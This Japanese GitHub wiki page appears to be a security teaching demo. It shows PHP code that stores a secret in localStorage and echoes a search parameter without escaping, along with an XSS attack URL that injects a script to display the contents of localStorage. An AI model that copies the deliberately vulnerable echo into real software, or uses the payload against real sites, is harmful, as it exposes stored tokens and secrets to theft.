クロスサイトスクリプティング localstorage

クロスサイトスクリプティング(XSS)攻撃 1

locatStorageの中身を取り出す

脆弱なソースコード (PHP)

<div class="box">locatStorageの中身を取り出す<br>
<form method="get" action="">search
<input name="word" type="text">
<input type="submit">
</form>
</div>
<script>
    localStorage.setItem('secret', '${secret}');
</script>
<?php
echo "<h1>".filter_input(INPUT_GET, 'word')."</h1>";
?>

攻撃方法

xss-localstorage.php?word=<script>alert(JSON.stringify(localStorage))</script>

クロスサイトスクリプティング localstorage - yujitounai/helloworld GitHub Wiki

クロスサイトスクリプティング(XSS)攻撃 1

脆弱なソースコード (PHP)

攻撃方法

⚠️ GitHub.com Fallback ⚠️

クロスサイトスクリプティング localstorage - yujitounai/helloworld GitHub Wiki

クロスサイトスクリプティング(XSS)攻撃 1

脆弱なソースコード (PHP)

攻撃方法

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️